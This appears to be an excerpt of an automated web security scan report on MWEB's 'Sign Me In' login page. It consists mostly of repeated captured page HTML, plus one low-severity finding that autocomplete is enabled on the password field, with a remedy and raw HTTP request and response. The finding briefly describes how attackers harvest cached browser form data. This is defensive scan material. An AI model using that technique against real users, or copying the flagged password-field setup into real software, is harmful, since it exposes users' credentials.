var oTag = oArea + ";sz=" + oSize + ";" + "tile=" + oTile + ";posno=" + oPos + ";ord=" + randomnumber + "?";
//document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"><\/script>');
document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"></script>');
}
-->
</script>
<body>
<div class="alignContainer">
<div class="mainContainer">
<div class="masthead"><a href="http://www.mweb.co.za"><img src="/images/mweb/ma_mweb_logo.gif" /></a><img src="/images/mweb/ma_masthead.jpg" /></div>
<div class="bodyContainer">
<div class="cnrs"><img src="/images/mweb/ma_top_cnrs.gif" /></div>
<div class="leftCol"><img src="/images/mweb/ma_head_importantnotice.gif" width="392" height="62" />
<div class="ma_txt">Always keep your password safe from prying eyes. Do not share it with anyone. If your password is compromised, people will be able to abuse your account and use your Internet connection. We advise that you change your password on a regular basis. </div>
<div class="ma_txt"></div>
<img src="/images/mweb/ma_head_signin.gif" />
<div class="ma_txt">
<ul>
<li>Access My Account to monitor your data consumption, view billing information and much more</li>
<li>Access MWEB Message Centre to send and receive e-mails, faxes and manage your contacts</li>
<li>Get all the news, lifestyle and entertainment info that you want, customised to your needs with My MWEB</li>
<li>Access MWEB Mobile to send SMS's and Batch SMS's </li>
</ul>
</div>
</div>
<div class="rightCol">
<div class="smi_block">
<div class="containerWidth">
<!-- CONTAINER (SETS COLOR + PADDING) -->
<div class="containerStyles">
<div>
<div class="logo">
<span id="lblSMIText" style="color:White;font-family:arial;font-size:17pt;"><strong><span class='signInText'>Sign</span></strong> Me In</span>
</div>
<div class="whatIsThis">
<span class="textLinkWhite">
<span id="m_whatIsThisLabel">
<a href="whats_this.aspx">What is this</a></span>
</span>
<span>
<span id="lblQuestionMark" style="color:White;font-family:arial;font-size:16pt;"><strong>?</strong></span>
</span>
</div>
</div>
<div class="clearAndLine">
<!-- <img height="1" width="1" > -->
</div>
<div class="greyLine">
<!-- <img height="1" width="1" > -->
</div>
<span id="m_topTextLabel"><div class="topText">Never signed in before? <span class="textLinkBlack"><a href="registration.aspx?">Click here to register.</a></span></div></span>
<!-- VALIDATION -->
<div class="topText">
<div><b><span id="m_systemMessage"></span></b></div><div id="ValidationSummaryMain" class="errorText" style="display:none;">
</div><span id="m_notificationText" class="errorText" style="font-color: red">Value cannot be null.
Parameter name: key</span></div>
<!-- FORM -->
<div class="contentContainer">
<table cellSpacing="0" cellPadding="0" border="0">
<!-- email address -->
<tr><td style="WIDTH: 125px"><b><span id="m_emailLabel">E-mail Address</span></b><span style="FONT-SIZE: 10px"> »</span></td><td align="right"><span class="inputShadow"><input name="m_emailAddress" type="text" id="m_emailAddress" style="WIDTH: 155px" /></span><span id="RequiredFieldValidatorEmail" style="color:Red;display:none;"></span></td></tr>
<!-- password -->
<tr><td class="passwordField"><b><span id="m_passwordLabel">Password</span></b><span style="FONT-SIZE: 10px"> »</span></td><td class="passwordField" align="right"><span class="inputShadow"><input name="m_password" type="password" id="m_password" style="WIDTH: 155px" maxlength="16" /></span><span id="RequiredFieldValidatorPassword" style="color:Red;display:none;"></span></td></tr>
<!-- remember me -->
<span id="m_rememberMeLabel"><tr><td> </td><td class="rememberMe"><INPUT id="m_rememberMe" type="checkbox" name="m_rememberMe" value="true" style="border:0px"/>Remember me</td></tr></span>
<!-- reauth: if you are not... -->
<span id="m_reauthSection"></span>
</table></div>
<!-- BUTTONS -->
<div class="buttonSection" align="center">
<input onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(''); " name="m_submitButton" type="submit" id="m_submitButton" class="buttOrange" value="SIGN IN" />
<input name="m_failedCount" type="hidden" id="m_failedCount" />
<input name="m_authType" type="hidden" id="m_authType" /></div>
<!-- BOTTOM LINKS -->
<span id="m_bottomSectionLabel"><div class="bottomSection" align="center"><span class="textLinkWhite"><a href="reset_password.aspx?">Forgotten Password?</a></span></div></span></div>
<div class="otherLogin">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
<tr>
<td style="padding-bottom: 10px">
</td>
</tr>
</table>
</div>
<DIV>
<!-- SAFARI DETECT AND WARNING MESSAGE -->
<div id="safari_warning" class="warning_block" style="background-image:url(images/warning_block.jpg); background-repeat:no-repeat;">
<table cellpadding="0" cellspacing="0" class="tblSafariWarning" >
<tr>
<td>
<div class="safariWarningHearder">Safari browser users</div>
<ol>
<li>Accept all cookies</li>
<li>Enable Javascript</li>
<li>Disable pop up blocker</li>
</ol>
<div class="safariWarningLink">
For step by step guide on how to make these changes vist the <a href="http://www.mweb.co.za/helpcentre/SafariHelpGuide/tabid/1986/Default.aspx">MWEB Help Centre.</a>
</div>
</td>
</tr>
</table>
</div>
<!-- END SIGNMEIN BLOCK -->
<script type="text/javascript">
<!--
if((BrowserDetect.browser != "Safari"))
{
document.getElementById("safari_warning").style.display = "none";
}
//-->
</script>
</DIV>
<!--TEMPLATE-BOTTOM--><!--SMI--></div>
<div class="ad_block" >
<script language="javascript">
fncMakeBlockAd('https://ad.uk.doubleclick.net/adj/P4306.sa.24.com.mweb/SMI','300x250','1',null,3);
</script>
</div>
</div>
</div>
</div>
<div class="cnrs"><img src="/images/mweb/ma_bot_cnr.png" /></div>
<!-- Footer Starts -->
<div class="footerPos">
<span class="navybold">
<br />
<br />
© 1998 - <script type="text/javascript">CurrentYear()</script> MWEB | All rights reserved.
</span><br />
<a href="http://www.mweb.co.za/legalpolicies/tabid/1614/Default.aspx">Website Terms of Use</a> | <a href="http://www.mweb.co.za/legalpolicies/">Legal Notices</a> | <a href="http://www.mweb.co.za/productsservices/JoinUpgrade/tabid/96/Default.aspx">Join MWEB</a> |
<a href="http://www.mweb.com/">About Us</a> | <a href="http://www.mweb.co.za/helpcentre/ContactUs/tabid/390/Default.aspx">Contact Us</a><br /><a href="http://sales.24.com/ChannelInfo.aspx?channel_id=26">Advertise on MWEB </a> | <a href="http://www.mwebbusiness.co.za/Default.aspx">Get Your Business Online</a> | <a href="http://www.mweb.co.za/securitycentre/">Security Services</a> | <a href="http://www.mweb.co.za/helpcentre/">Help</a>
<p> </p>
</div>
<!-- end -->
</div>
</body>
<!-- FOCUS SCRIPT --><script language="javascript">function do_focus() {}</script>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("ValidationSummaryMain"));
var Page_Validators = new Array(document.getElementById("RequiredFieldValidatorEmail"), document.getElementById("RequiredFieldValidatorPassword"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var ValidationSummaryMain = document.all ? document.all["ValidationSummaryMain"] : document.getElementById("ValidationSummaryMain");
ValidationSummaryMain.headertext = "Errors in form information";
var RequiredFieldValidatorEmail = document.all ? document.all["RequiredFieldValidatorEmail"] : document.getElementById("RequiredFieldValidatorEmail");
RequiredFieldValidatorEmail.controltovalidate = "m_emailAddress";
RequiredFieldValidatorEmail.display = "None";
RequiredFieldValidatorEmail.evaluationfunction = "RequiredFieldValidato..
Auto Complete Enabled
Auto Complete Enabled
1
TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".
Impact
Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.Remedy
Add the attribute
autocomplete="off" to the form tag or to individual "input" fields.Actions to Take
- See the remedy for the solution.
- Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
- Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.
Required Skills for Successful Exploitation
Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.
External References
|
- /authentication.aspx
/authentication.aspx CONFIRMED |
Identified Field Name
m_password
Request
GET /authentication.aspx HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.signmein.co.za
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.signmein.co.za
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:21:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR PSAa PSDa OUR IND UNI",CP=""NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE STA PUR INT NAV""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17429
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD id="HEAD1"><title>
:: Sign Me In ::
</title><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" /><meta content="C#" name="CODE_LANGUAGE" /><meta content="JavaScript" name="vs_defaultClientScript" /><meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema" /><link id="styleRel" href="styles/smi2.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="scripts/scripts.js"></script>
<script language="javascript">
function do_registration() {
window.location.href = ''
}
function setEmailFocus()
{
document.getElementById("m_emailAddress").focus();
}
</script>
</HEAD>
<body onload="javascript : do_focus();">
<form name="form1" method="post" action="authentication.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YVtZL4c1IiPwvADNkEpMHWGtLtBjGPDpIvfH1INmPvMob3jKoQIk0KdQZPyz9E_XHnS0q-3QW2a7X4--hXVPEbc2NV81&t=634214551086341278" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU=" />
</div>
<!--TEMPLATE-TOP--><style type="text/css">
<!--
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
background-color: #d7dfe6;
background-image: url(/images/mweb/ma_bg_tile.jpg);
background-repeat: repeat-x;
background-position: top;
text-align: center;
}
img {
border:none;
}
a {
color:#212121;
/*font-weight:bold; */
text-decoration:none;
}
a:hover {
color:#00527d;
text-decoration:underline;
}
.alignContainer {
width:750px;
margin:auto;
}
.mainContainer {
width:750px;
float:left;
text-align:left;
}
.masthead {
width:750px;
float:left;
}
.bodyContainer {
width:750px;
float:left;
text-align:left;
background-color:white;
}
.cnrs {
float:left;
}
.leftCol {
width:395px;
float:left;
margin-left:15px;
display:inline;
}
.rightCol {
width:330px;
float:left;
}
/*bullet list*/
ul li {
background:url(/images/mweb/ma_org_bullet.gif) no-repeat 0 7px;
padding-left:20px;
margin-left:-30px;
list-style:none;
line-height:25px;
}
.ma_txt {
width:380px;
float:left;
margin-left:10px;
display:inline;
line-height:16px;
}
.ma_rcol_block {
width:309px;
height:255px;
float:left;
background-image:url(/images/mweb/ma_box_bg.gif);
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ad_block{
width:309px;
height:255px;
float:left;
/*background-image:url(/images/mweb/ma_box_bg.gif);*/
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ma_rcol_block img {
margin-top:20px;
display:inline;
}
/*smi style for green block*/
.smi_block{
width:300px;
float:left;
margin-left:10px;
display:inline;
}
.pixie_gem
{
width:100%;
float:left;
padding-top:10px;
padding-left:8px;
/*margin-left:10px;*/
display:inline;
background-color:#D8ECF5;
}
/*Footer */
.footerPos
{
text-align:center;
}
.navybold
{
font-weight: 700;
color: #002e6c;
margin-top: 10px;
}
-->
</style>
<!-- Get Date -->
<script type="text/javascript">
<!--
function CurrentYear()
{
var date = new Date();
var year = date.getFullYear();
document.write(year);
}
var randomnumber = Math.floor(Math.random() * 1111111111111111);
function fncMakeBlockAd(oArea, oSize, oPos, oOrd, oTile) {
var oTag = oArea + ";sz=" + oSize + ";" + "tile=" + oTile + ";posno=" + oPos + ";ord=" + randomnumber + "?";
//document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"><\/script>');
document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"></script>');
}
-->
</script>
<body>
<div class="alignContainer">
<div class="mainContainer">
<div class="masthead"><a href="http://www.mweb.co.za"><img src="/images/mweb/ma_mweb_logo.gif" /></a><img src="/images/mweb/ma_masthead.jpg" /></div>
<div class="bodyContainer">
<div class="cnrs"><img src="/images/mweb/ma_top_cnrs.gif" /></div>
<div class="leftCol"><img src="/images/mweb/ma_head_importantnotice.gif" width="392" height="62" />
<div class="ma_txt">Always keep your password safe from prying eyes. Do not share it with anyone. If your password is compromised, people will be able to abuse your account and use your Internet connection. We advise that you change your password on a regular basis. </div>
<div class="ma_txt"></div>
<img src="/images/mweb/ma_head_signin.gif" />
<div class="ma_txt">
<ul>
<li>Access My Account to monitor your data consumption, view billing information and much more</li>
<li>Access MWEB Message Centre to send and receive e-mails, faxes and manage your contacts</li>
<li>Get all the news, lifestyle and entertainment info that you want, customised to your needs with My MWEB</li>
<li>Access MWEB Mobile to send SMS's and Batch SMS's </li>
</ul>
</div>
</div>
<div class="rightCol">
<div class="smi_block">
<div class="containerWidth">
<!-- CONTAINER (SETS COLOR + PADDING) -->
<div class="containerStyles">
<div>
<div class="logo">
<span id="lblSMIText" style="color:White;font-family:arial;font-size:17pt;"><strong><span class='signInText'>Sign</span></strong> Me In</span>
</div>
<div class="whatIsThis">
<span class="textLinkWhite">
<span id="m_whatIsThisLabel">
<a href="whats_this.aspx">What is this</a></span>
</span>
<span>
<span id="lblQuestionMark" style="color:White;font-family:arial;font-size:16pt;"><strong>?</strong></span>
</span>
</div>
</div>
<div class="clearAndLine">
<!-- <img height="1" width="1" > -->
</div>
<div class="greyLine">
<!-- <img height="1" width="1" > -->
</div>
<span id="m_topTextLabel"><div class="topText">Never signed in before? <span class="textLinkBlack"><a href="registration.aspx?">Click here to register.</a></span></div></span>
<!-- VALIDATION -->
<div class="topText">
<div><b><span id="m_systemMessage"></span></b></div><div id="ValidationSummaryMain" class="errorText" style="display:none;">
</div><span id="m_notificationText" class="errorText" style="font-color: red">Value cannot be null.
Parameter name: key</span></div>
<!-- FORM -->
<div class="contentContainer">
<table cellSpacing="0" cellPadding="0" border="0">
<!-- email address -->
<tr><td style="WIDTH: 125px"><b><span id="m_emailLabel">E-mail Address</span></b><span style="FONT-SIZE: 10px"> »</span></td><td align="right"><span class="inputShadow"><input name="m_emailAddress" type="text" id="m_emailAddress" style="WIDTH: 155px" /></span><span id="RequiredFieldValidatorEmail" style="color:Red;display:none;"></span></td></tr>
<!-- password -->
<tr><td class="passwordField"><b><span id="m_passwordLabel">Password</span></b><span style="FONT-SIZE: 10px"> »</span></td><td class="passwordField" align="right"><span class="inputShadow"><input name="m_password" type="password" id="m_password" style="WIDTH: 155px" maxlength="16" /></span><span id="RequiredFieldValidatorPassword" style="color:Red;display:none;"></span></td></tr>
<!-- remember me -->
<span id="m_rememberMeLabel"><tr><td> </td><td class="rememberMe"><INPUT id="m_rememberMe" type="checkbox" name="m_rememberMe" value="true" style="border:0px"/>Remember me</td></tr></span>
<!-- reauth: if you are not... -->
<span id="m_reauthSection"></span>
</table></div>
<!-- BUTTONS -->
<div class="buttonSection" align="center">
<input onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(''); " name="m_submitButton" type="submit" id="m_submitButton" class="buttOrange" value="SIGN IN" />
<input name="m_failedCount" type="hidden" id="m_failedCount" />
<input name="m_authType" type="hidden" id="m_authType" /></div>
<!-- BOTTOM LINKS -->
<span id="m_bottomSectionLabel"><div class="bottomSection" align="center"><span class="textLinkWhite"><a href="reset_password.aspx?">Forgotten Password?</a></span></div></span></div>
<div class="otherLogin">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
<tr>
<td style="padding-bottom: 10px">
</td>
</tr>
</table>
</div>
<DIV>
<!-- SAFARI DETECT AND WARNING MESSAGE -->
<div id="safari_warning" class="warning_block" style="background-image:url(images/warning_block.jpg); background-repeat:no-repeat;">
<table cellpadding="0" cellspacing="0" class="tblSafariWarning" >
<tr>
<td>
<div class="safariWarningHearder">Safari browser users</div>
<ol>
<li>Accept all cookies</li>
<li>Enable Javascript</li>
<li>Disable pop up blocker</li>
</ol>
<div class="safariWarningLink">
For step by step guide on how to make these changes vist the <a href="http://www.mweb.co.za/helpcentre/SafariHelpGuide/tabid/1986/Default.aspx">MWEB Help Centre.</a>
</div>
</td>
</tr>
</table>
</div>
<!-- END SIGNMEIN BLOCK -->
<script type="text/javascript">
<!--
if((BrowserDetect.browser != "Safari"))
{
document.getElementById("safari_warning").style.display = "none";
}
//-->
</script>
</DIV>
<!--TEMPLATE-BOTTOM--><!--SMI--></div>
<div class="ad_block" >
<script language="javascript">
fncMakeBlockAd('https://ad.uk.doubleclick.net/adj/P4306.sa.24.com.mweb/SMI','300x250','1',null,3);
</script>
</div>
</div>
</div>
</div>
<div class="cnrs"><img src="/images/mweb/ma_bot_cnr.png" /></div>
<!-- Footer Starts -->
<div class="footerPos">
<span class="navybold">
<br />
<br />
© 1998 - <script type="text/javascript">CurrentYear()</script> MWEB | All rights reserved.
</span><br />
<a href="http://www.mweb.co.za/legalpolicies/tabid/1614/Default.aspx">Website Terms of Use</a> | <a href="http://www.mweb.co.za/legalpolicies/">Legal Notices</a> | <a href="http://www.mweb.co.za/productsservices/JoinUpgrade/tabid/96/Default.aspx">Join MWEB</a> |
<a href="http://www.mweb.com/">About Us</a> | <a href="http://www.mweb.co.za/helpcentre/ContactUs/tabid/390/Default.aspx">Contact Us</a><br /><a href="http://sales.24.com/ChannelInfo.aspx?channel_id=26">Advertise on MWEB </a> | <a href="http://www.mwebbusiness.co.za/Default.aspx">Get Your Business Online</a> | <a href="http://www.mweb.co.za/securitycentre/">Security Services</a> | <a href="http://www.mweb.co.za/helpcentre/">Help</a>
<p> </p>
</div>
<!-- end -->
</div>
</body>
<!-- FOCUS SCRIPT --><script language="javascript">function do_focus() {}</script>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("ValidationSummaryMain"));
var Page_Validators = new Array(document.getElementById("RequiredFieldValidatorEmail"), document.getElementById("RequiredFieldValidatorPassword"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var ValidationSummaryMain = document.all ? document.all["ValidationSummaryMain"] : document.getElementById("ValidationSummaryMain");
ValidationSummaryMain.headertext = "Errors in form information";
var RequiredFieldValidatorEmail = document.all ? document.all["RequiredFieldValidatorEmail"] : document.getElementById("RequiredFieldValidatorEmail");
RequiredFieldValidatorEmail.controltovalidate = "m_emailAddress";
RequiredFieldValidatorEmail.display = "None";
RequiredFieldValidatorEmail.evaluationfunction = "RequiredFieldValidato..
Date: Mon, 21 Mar 2011 17:21:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR PSAa PSDa OUR IND UNI",CP=""NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE STA PUR INT NAV""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17429
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD id="HEAD1"><title>
:: Sign Me In ::
</title><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" /><meta content="C#" name="CODE_LANGUAGE" /><meta content="JavaScript" name="vs_defaultClientScript" /><meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema" /><link id="styleRel" href="styles/smi2.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="scripts/scripts.js"></script>
<script language="javascript">
function do_registration() {
window.location.href = ''
}
function setEmailFocus()
{
document.getElementById("m_emailAddress").focus();
}
</script>
</HEAD>
<body onload="javascript : do_focus();">
<form name="form1" method="post" action="authentication.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YVtZL4c1IiPwvADNkEpMHWGtLtBjGPDpIvfH1INmPvMob3jKoQIk0KdQZPyz9E_XHnS0q-3QW2a7X4--hXVPEbc2NV81&t=634214551086341278" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU=" />
</div>
<!--TEMPLATE-TOP--><style type="text/css">
<!--
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
background-color: #d7dfe6;
background-image: url(/images/mweb/ma_bg_tile.jpg);
background-repeat: repeat-x;
background-position: top;
text-align: center;
}
img {
border:none;
}
a {
color:#212121;
/*font-weight:bold; */
text-decoration:none;
}
a:hover {
color:#00527d;
text-decoration:underline;
}
.alignContainer {
width:750px;
margin:auto;
}
.mainContainer {
width:750px;
float:left;
text-align:left;
}
.masthead {
width:750px;
float:left;
}
.bodyContainer {
width:750px;
float:left;
text-align:left;
background-color:white;
}
.cnrs {
float:left;
}
.leftCol {
width:395px;
float:left;
margin-left:15px;
display:inline;
}
.rightCol {
width:330px;
float:left;
}
/*bullet list*/
ul li {
background:url(/images/mweb/ma_org_bullet.gif) no-repeat 0 7px;
padding-left:20px;
margin-left:-30px;
list-style:none;
line-height:25px;
}
.ma_txt {
width:380px;
float:left;
margin-left:10px;
display:inline;
line-height:16px;
}
.ma_rcol_block {
width:309px;
height:255px;
float:left;
background-image:url(/images/mweb/ma_box_bg.gif);
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ad_block{
width:309px;
height:255px;
float:left;
/*background-image:url(/images/mweb/ma_box_bg.gif);*/
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ma_rcol_block img {
margin-top:20px;
display:inline;
}
/*smi style for green block*/
.smi_block{
width:300px;
float:left;
margin-left:10px;
display:inline;
}
.pixie_gem
{
width:100%;
float:left;
padding-top:10px;
padding-left:8px;
/*margin-left:10px;*/
display:inline;
background-color:#D8ECF5;
}
/*Footer */
.footerPos
{
text-align:center;
}
.navybold
{
font-weight: 700;
color: #002e6c;
margin-top: 10px;
}
-->
</style>
<!-- Get Date -->
<script type="text/javascript">
<!--
function CurrentYear()
{
var date = new Date();
var year = date.getFullYear();
document.write(year);
}
var randomnumber = Math.floor(Math.random() * 1111111111111111);
function fncMakeBlockAd(oArea, oSize, oPos, oOrd, oTile) {
var oTag = oArea + ";sz=" + oSize + ";" + "tile=" + oTile + ";posno=" + oPos + ";ord=" + randomnumber + "?";
//document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"><\/script>');
document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"></script>');
}
-->
</script>
<body>
<div class="alignContainer">
<div class="mainContainer">
<div class="masthead"><a href="http://www.mweb.co.za"><img src="/images/mweb/ma_mweb_logo.gif" /></a><img src="/images/mweb/ma_masthead.jpg" /></div>
<div class="bodyContainer">
<div class="cnrs"><img src="/images/mweb/ma_top_cnrs.gif" /></div>
<div class="leftCol"><img src="/images/mweb/ma_head_importantnotice.gif" width="392" height="62" />
<div class="ma_txt">Always keep your password safe from prying eyes. Do not share it with anyone. If your password is compromised, people will be able to abuse your account and use your Internet connection. We advise that you change your password on a regular basis. </div>
<div class="ma_txt"></div>
<img src="/images/mweb/ma_head_signin.gif" />
<div class="ma_txt">
<ul>
<li>Access My Account to monitor your data consumption, view billing information and much more</li>
<li>Access MWEB Message Centre to send and receive e-mails, faxes and manage your contacts</li>
<li>Get all the news, lifestyle and entertainment info that you want, customised to your needs with My MWEB</li>
<li>Access MWEB Mobile to send SMS's and Batch SMS's </li>
</ul>
</div>
</div>
<div class="rightCol">
<div class="smi_block">
<div class="containerWidth">
<!-- CONTAINER (SETS COLOR + PADDING) -->
<div class="containerStyles">
<div>
<div class="logo">
<span id="lblSMIText" style="color:White;font-family:arial;font-size:17pt;"><strong><span class='signInText'>Sign</span></strong> Me In</span>
</div>
<div class="whatIsThis">
<span class="textLinkWhite">
<span id="m_whatIsThisLabel">
<a href="whats_this.aspx">What is this</a></span>
</span>
<span>
<span id="lblQuestionMark" style="color:White;font-family:arial;font-size:16pt;"><strong>?</strong></span>
</span>
</div>
</div>
<div class="clearAndLine">
<!-- <img height="1" width="1" > -->
</div>
<div class="greyLine">
<!-- <img height="1" width="1" > -->
</div>
<span id="m_topTextLabel"><div class="topText">Never signed in before? <span class="textLinkBlack"><a href="registration.aspx?">Click here to register.</a></span></div></span>
<!-- VALIDATION -->
<div class="topText">
<div><b><span id="m_systemMessage"></span></b></div><div id="ValidationSummaryMain" class="errorText" style="display:none;">
</div><span id="m_notificationText" class="errorText" style="font-color: red">Value cannot be null.
Parameter name: key</span></div>
<!-- FORM -->
<div class="contentContainer">
<table cellSpacing="0" cellPadding="0" border="0">
<!-- email address -->
<tr><td style="WIDTH: 125px"><b><span id="m_emailLabel">E-mail Address</span></b><span style="FONT-SIZE: 10px"> »</span></td><td align="right"><span class="inputShadow"><input name="m_emailAddress" type="text" id="m_emailAddress" style="WIDTH: 155px" /></span><span id="RequiredFieldValidatorEmail" style="color:Red;display:none;"></span></td></tr>
<!-- password -->
<tr><td class="passwordField"><b><span id="m_passwordLabel">Password</span></b><span style="FONT-SIZE: 10px"> »</span></td><td class="passwordField" align="right"><span class="inputShadow"><input name="m_password" type="password" id="m_password" style="WIDTH: 155px" maxlength="16" /></span><span id="RequiredFieldValidatorPassword" style="color:Red;display:none;"></span></td></tr>
<!-- remember me -->
<span id="m_rememberMeLabel"><tr><td> </td><td class="rememberMe"><INPUT id="m_rememberMe" type="checkbox" name="m_rememberMe" value="true" style="border:0px"/>Remember me</td></tr></span>
<!-- reauth: if you are not... -->
<span id="m_reauthSection"></span>
</table></div>
<!-- BUTTONS -->
<div class="buttonSection" align="center">
<input onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(''); " name="m_submitButton" type="submit" id="m_submitButton" class="buttOrange" value="SIGN IN" />
<input name="m_failedCount" type="hidden" id="m_failedCount" />
<input name="m_authType" type="hidden" id="m_authType" /></div>
<!-- BOTTOM LINKS -->
<span id="m_bottomSectionLabel"><div class="bottomSection" align="center"><span class="textLinkWhite"><a href="reset_password.aspx?">Forgotten Password?</a></span></div></span></div>
<div class="otherLogin">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
<tr>
<td style="padding-bottom: 10px">
</td>
</tr>
</table>
</div>
<DIV>
<!-- SAFARI DETECT AND WARNING MESSAGE -->
<div id="safari_warning" class="warning_block" style="background-image:url(images/warning_block.jpg); background-repeat:no-repeat;">
<table cellpadding="0" cellspacing="0" class="tblSafariWarning" >
<tr>
<td>
<div class="safariWarningHearder">Safari browser users</div>
<ol>
<li>Accept all cookies</li>
<li>Enable Javascript</li>
<li>Disable pop up blocker</li>
</ol>
<div class="safariWarningLink">
For step by step guide on how to make these changes vist the <a href="http://www.mweb.co.za/helpcentre/SafariHelpGuide/tabid/1986/Default.aspx">MWEB Help Centre.</a>
</div>
</td>
</tr>
</table>
</div>
<!-- END SIGNMEIN BLOCK -->
<script type="text/javascript">
<!--
if((BrowserDetect.browser != "Safari"))
{
document.getElementById("safari_warning").style.display = "none";
}
//-->
</script>
</DIV>
<!--TEMPLATE-BOTTOM--><!--SMI--></div>
<div class="ad_block" >
<script language="javascript">
fncMakeBlockAd('https://ad.uk.doubleclick.net/adj/P4306.sa.24.com.mweb/SMI','300x250','1',null,3);
</script>
</div>
</div>
</div>
</div>
<div class="cnrs"><img src="/images/mweb/ma_bot_cnr.png" /></div>
<!-- Footer Starts -->
